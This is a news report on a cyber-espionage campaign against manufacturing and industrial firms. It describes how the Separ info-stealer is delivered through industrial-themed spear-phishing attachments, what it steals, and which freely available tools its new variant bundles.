CyberX’s Section 52 threat intelligence team has warned of a new ongoing cyber-espionage campaign aimed at manufacturing and other industrial firms. While more than half of the targeted companies are based in South Korea, victims were also detected in China, Thailand, Japan, Indonesia, Turkey, Germany, the UK and Ecuador. The team has identified over than 200 compromised organizations, including an unnamed multi-billion dollar Korean conglomerate that manufactures critical infrastructure equipment, as well as a steel manufacturer, a chemical plant construction firm, a pipe manufacturer, a valve manufacturer, and an engineering firm.
The goal of the campaign, dubbed Gangnam Industrial Style, is information theft, namely passwords and documents that could be used for trade secrets and intellectual property theft, to conduct cyber reconnaissance for future attacks, or to compromise industrial control networks for ransomware attacks. To achieve this, the adversary uses a new version of an older information stealer called Separ.
The malware is delivered via spear phishing emails with industrial-themed attachments that could be of interest to targeted companies. These include an RFQ for designing a power plant in the Czech Republic that was supposedly sent by a Siemens subsidiary, an RFQ for designing a coal-fired power plant in Indonesia, supposedly sent by the engineering subsidiary of a major Japanese conglomerate, and an email purporting to be from a major European engineering company that designs gas processing and production plants.
The malware itself lurks in malicious ZIP attachments disguised as PDF files. Once installed, Separ steals browser and email credentials and searches for documents with a range of extensions, including Office documents and images. The collected data is then sent via FTP to the attacker-controlled server.
According to the researchers, the latest Separ variant leverages the Autorun feature to survive system reboots and comes with a bunch of mostly freely available tools:
Browser Password Dump v6.0 by SecurityXploded
Email Password Dump v3.0 by SecurityXploded
NcFTPPut 3.2.5 – Free FTP client
The LaZagne Project (password dumper)
deltree (folder delete)
Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03
MOVEit Freely 1.0.0.1 – Secure FTP Client
Sleep tool by tricerat
"The new version also uses certain components that were not used in the previous version including: The LaZagne Project , deltree, MOVEit Freely 1.0.0.1 – Secure FTP Client , and “Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03,”" researchers noted.
According to CyberX, new stolen credentials are still being uploaded to the attackers command and control server indicating that the attacks are still ongoing.
